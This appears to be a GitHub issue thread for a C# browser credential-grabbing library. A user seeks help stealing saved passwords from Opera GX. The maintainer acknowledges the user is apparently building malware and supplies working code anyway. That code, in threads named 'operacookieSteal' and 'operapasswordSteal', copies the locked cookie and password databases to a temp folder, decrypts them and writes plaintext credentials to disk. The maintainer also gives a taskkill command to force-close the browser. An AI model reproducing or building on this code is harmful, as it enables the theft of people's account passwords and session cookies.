### ISSUE TITLE
Opera GX Password Grabbing

### ISSUE THREAD

**Issue by acvq** [Stanley-GF/CockyGrabber#5]
I'm taking a look, but can't seem to understand how a password grabber for Opera would work, i have Edge / Chrome grabbers working fine (with some errors like appearing hostname = : / No user no pass) it would be great if you could do an example of Opera grabber like u have on that folder. Thanks <3

**Comment by acvq** [comment]
I keep getting the error "database is locked", yes I created a key, this is my code:

NOTE: ERROR IS ONLY ON OPERA GRABBER 

`EdgeGrabber eg = new EdgeGrabber(); ChromeGrabber cg = new ChromeGrabber(); OperaGxGrabber og = new OperaGxGrabber();
            byte[] keyToDecryptEncrypedDB = og.GetKey();



             if (eg.CookiesExists() && eg.CookiesExists() && eg.KeyExists())
            {
                foreach (var item in eg.GetAllPasswords(eg.GetKey()))
                {
                    passwordsedge.AppendLine(item.url + " = " + item.username + ":" + item.password + "\r\n");
                }
                foreach (Cookie cookie in eg.GetAllCookies(eg.GetKey()))
                {
                    cookiesedge.AppendLine(cookie.HostName + " = " + cookie.Name + ": " + cookie.Value);
                }
            }
            if (cg.CookiesExists() && cg.PasswordsExists() && cg.KeyExists())
            {
                foreach (var item in cg.GetAllPasswords(cg.GetKey()))
                {
                    passwordchrome.AppendLine(item.url + " = " + item.username + ":" + item.password + "\r\n");
                }
                foreach (Cookie cookie in cg.GetAllCookies(cg.GetKey()))
                {
                    cookieschrome.AppendLine(cookie.HostName + " = " + cookie.Name + ": " + cookie.Value);
                }
            }
            if (og.CookiesExists() && og.PasswordsExists() && cg.KeyExists())
            {
                foreach (var item in og.GetAllPasswords(keyToDecryptEncrypedDB))
                {
                    passwordopera.AppendLine(item.url + " = " + item.username + ":" + item.password + "\r\n");
                }
                foreach (Cookie cookie in og.GetAllCookies(keyToDecryptEncrypedDB))
                {
                    cookiesopera.AppendLine(cookie.HostName + " = " + cookie.Name + ": " + cookie.Value);
                }
            }`

**Comment by Stanley-GF** [comment]
Maybe process can make the SQLite database locked.

Make this command in your terminal `taskkill /IM opera.exe /F` and try again

In your case, I think you are making a malware (I'm not responsable in all case) so you need, if you don't want to close the web browsers, to copy the file. 

Example: 
```cs

            System.Threading.Thread operacookieSteal = new System.Threading.Thread(p =>
            {
                if (System.IO.File.Exists(System.IO.Path.GetTempPath() + "cookie-crypted.cockygrabber")) { System.IO.File.Delete(System.IO.Path.GetTempPath() + "cookie-crypted.cockygrabber"); }
                if (System.IO.File.Exists(System.IO.Path.GetTempPath() + "cookie.cockygrabber")) { System.IO.File.Delete(System.IO.Path.GetTempPath() + "cookie.cockygrabber"); }

                CockyGrabber.OperaGxGrabber hesys = new CockyGrabber.OperaGxGrabber();
                System.IO.File.Copy(hesys.OperaGxCookiePath, System.IO.Path.GetTempPath() + "cookie-crypted.cockygrabber");
                hesys.OperaGxCookiePath = System.IO.Path.GetTempPath() + "cookie-crypted.cockygrabber";
                byte[] key = hesys.GetKey();
                System.Text.StringBuilder builder = new System.Text.StringBuilder();
                foreach (var item in hesys.GetAllCookies(key))
                {
                    builder.AppendLine(item.HostName + " = " + item.Name + ":" + item.Value);
                }
                System.IO.File.WriteAllText(System.IO.Path.GetTempPath() + "cookie.cockygrabber", builder.ToString());
                System.Console.WriteLine("Uncrypted cookie saved as " + System.IO.Path.GetTempPath() + "cookie.cockygrabber");
                
            });
            System.Threading.Thread operapasswordSteal = new System.Threading.Thread(p =>
            {
                if (System.IO.File.Exists(System.IO.Path.GetTempPath() + "password-crypted.cockygrabber")) { System.IO.File.Delete(System.IO.Path.GetTempPath() + "password-crypted.cockygrabber"); }
                if (System.IO.File.Exists(System.IO.Path.GetTempPath() + "password.cockygrabber")) { System.IO.File.Delete(System.IO.Path.GetTempPath() + "password.cockygrabber"); }
                CockyGrabber.OperaGxGrabber hesys = new CockyGrabber.OperaGxGrabber();
                System.IO.File.Copy(hesys.OperaGXPasswordsPath, System.IO.Path.GetTempPath() + "password-crypted.cockygrabber");
                hesys.OperaGXPasswordsPath = System.IO.Path.GetTempPath() + "password-crypted.cockygrabber";
                byte[] key = hesys.GetKey();
                System.Text.StringBuilder builder = new System.Text.StringBuilder();
                foreach (var item in hesys.GetAllPasswords(key))
                {
                    builder.AppendLine(item.url + " = " + item.username + ":" + item.password);
                }
                System.IO.File.WriteAllText(System.IO.Path.GetTempPath() + "password.cockygrabber", builder.ToString());
                System.Console.WriteLine("Uncrypted cookie saved as " + System.IO.Path.GetTempPath() + "password.cockygrabber");

            });


            operacookieSteal.Start();
            operapasswordSteal.Start();
            System.Console.ReadKey();
```

**Comment by Stanley-GF** [comment]
Re-open an issue if you need more help

**Comment by Stanley-GF** [comment]
I keep it opened if somebody want to fix the error...

**Comment by Stanley-GF** [comment]
P.S it's just because it's already opened, see the code in snippet

**Comment by Stanley-GF** [comment]
https://github.com/Stanley-GF/CockyGrabber/issues/5#issuecomment-830768992
